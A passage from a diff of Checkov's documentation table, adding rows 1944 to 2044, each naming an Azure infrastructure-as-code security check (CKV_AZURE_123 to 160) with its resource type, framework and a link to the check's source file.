+| 1944 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) |
+| 1945 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) |
+| 1946 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) |
+| 1947 | CKV_AZURE_125 | resource | Microsoft.ServiceFabric/clusters | Ensures that Service Fabric use three levels of protection available | arm | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py) |
+| 1948 | CKV_AZURE_125 | resource | Microsoft.ServiceFabric/clusters | Ensures that Service Fabric use three levels of protection available | Bicep | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py) |
+| 1949 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | 
[AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) |
+| 1950 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) |
+| 1951 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) |
+| 1952 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) |
+| 1953 | CKV_AZURE_129 | resource | Microsoft.DBforMariaDB/servers | Ensure that MariaDB server enables geo-redundant backups | arm | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py) |
+| 1954 | CKV_AZURE_129 | resource | Microsoft.DBforMariaDB/servers | Ensure that MariaDB server enables geo-redundant backups | Bicep | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py) |
+| 1955 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) |
+| 1956 | CKV_AZURE_130 | resource | 
Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) |
+| 1957 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) |
+| 1958 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) |
+| 1959 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) |
+| 1960 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) |
+| 1961 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) |
+| 1962 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | 
[CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) |
+| 1963 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) |
+| 1964 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) |
+| 1965 | CKV_AZURE_133 | resource | Microsoft.Network/frontdoorWebApplicationFirewallPolicies | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | arm | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py) |
+| 1966 | CKV_AZURE_133 | resource | Microsoft.Network/frontdoorWebApplicationFirewallPolicies | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Bicep | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py) |
+| 1967 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) |
+| 1968 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) |
+| 1969 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) |
+| 1970 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) |
+| 1971 | CKV_AZURE_135 | resource | Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | arm | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py) |
+| 1972 | CKV_AZURE_135 | resource | Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies | Ensure Application Gateway WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Bicep | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py) |
+| 1973 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) |
+| 1974 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) |
+| 1975 | CKV_AZURE_137 | resource | Microsoft.ContainerRegistry/registries | Ensure ACR admin account is disabled | arm | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAdminAccountDisabled.py) |
+| 1976 | CKV_AZURE_137 | resource | Microsoft.ContainerRegistry/registries | Ensure ACR admin account is disabled | Bicep | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAdminAccountDisabled.py) |
+| 1977 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) |
+| 1978 | CKV_AZURE_138 | resource | Microsoft.ContainerRegistry/registries | Ensures that ACR disables anonymous pulling of images | arm | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py) |
+| 1979 | CKV_AZURE_138 | resource | 
Microsoft.ContainerRegistry/registries | Ensures that ACR disables anonymous pulling of images | Bicep | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py) |
+| 1980 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) |
+| 1981 | CKV_AZURE_139 | resource | Microsoft.ContainerRegistry/registries | Ensure ACR set to disable public networking | arm | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py) |
+| 1982 | CKV_AZURE_139 | resource | Microsoft.ContainerRegistry/registries | Ensure ACR set to disable public networking | Bicep | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py) |
+| 1983 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) |
+| 1984 | CKV_AZURE_140 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Local Authentication is disabled on CosmosDB | arm | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py) |
+| 1985 | CKV_AZURE_140 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Local Authentication is disabled on CosmosDB | Bicep | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py) |
+| 1986 | CKV_AZURE_140 | resource | 
azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) |
+| 1987 | CKV_AZURE_141 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS local admin account is disabled | arm | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLocalAdminDisabled.py) |
+| 1988 | CKV_AZURE_141 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS local admin account is disabled | Bicep | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLocalAdminDisabled.py) |
+| 1989 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) |
+| 1990 | CKV_AZURE_142 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) |
+| 1991 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) |
+| 1992 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) |
+| 1993 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function 
app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 1994 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 1995 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 1996 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | Bicep | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 1997 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
+| 1998 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
+| 1999 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
+| 2000 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function 
app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
+| 2001 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
+| 2002 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
+| 2003 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) |
+| 2004 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) |
+| 2005 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) |
+| 2006 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | 
[VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 2007 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 2008 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 2009 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | +| 2010 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 2011 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 2012 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | 
[MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | +| 2013 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | +| 2014 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | +| 2015 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | +| 2016 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | +| 2017 | CKV_AZURE_153 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | arm | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py) | +| 2018 | CKV_AZURE_153 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Bicep | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py) | +| 2019 | CKV_AZURE_153 | resource | Microsoft.Web/sites/slots | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | arm | 
[AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py) | +| 2020 | CKV_AZURE_153 | resource | Microsoft.Web/sites/slots | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Bicep | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py) | +| 2021 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 2022 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 2023 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 2024 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | +| 2025 | CKV_AZURE_155 | resource | Microsoft.Web/sites | Ensure debugging is disabled for the App service slot | arm | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py) | +| 2026 | CKV_AZURE_155 | resource | Microsoft.Web/sites | Ensure debugging is disabled for 
the App service slot | Bicep | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py) | +| 2027 | CKV_AZURE_155 | resource | Microsoft.Web/sites/slots | Ensure debugging is disabled for the App service slot | arm | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py) | +| 2028 | CKV_AZURE_155 | resource | Microsoft.Web/sites/slots | Ensure debugging is disabled for the App service slot | Bicep | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py) | +| 2029 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | +| 2030 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | +| 2031 | CKV_AZURE_157 | resource | Microsoft.Synapse/workspaces | Ensure that Synapse workspace has data_exfiltration_protection_enabled | arm | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py) | +| 2032 | CKV_AZURE_157 | resource | Microsoft.Synapse/workspaces | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Bicep | 
[SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py) | +| 2033 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | +| 2034 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | arm | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) | +| 2035 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | Bicep | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) | +| 2036 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure Databricks Workspace data plane to control plane communication happens over private link | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | +| 2037 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 2038 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | 
[FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 2039 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 2040 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 2041 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 2042 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | +| 2043 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 2044 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 2045 | 
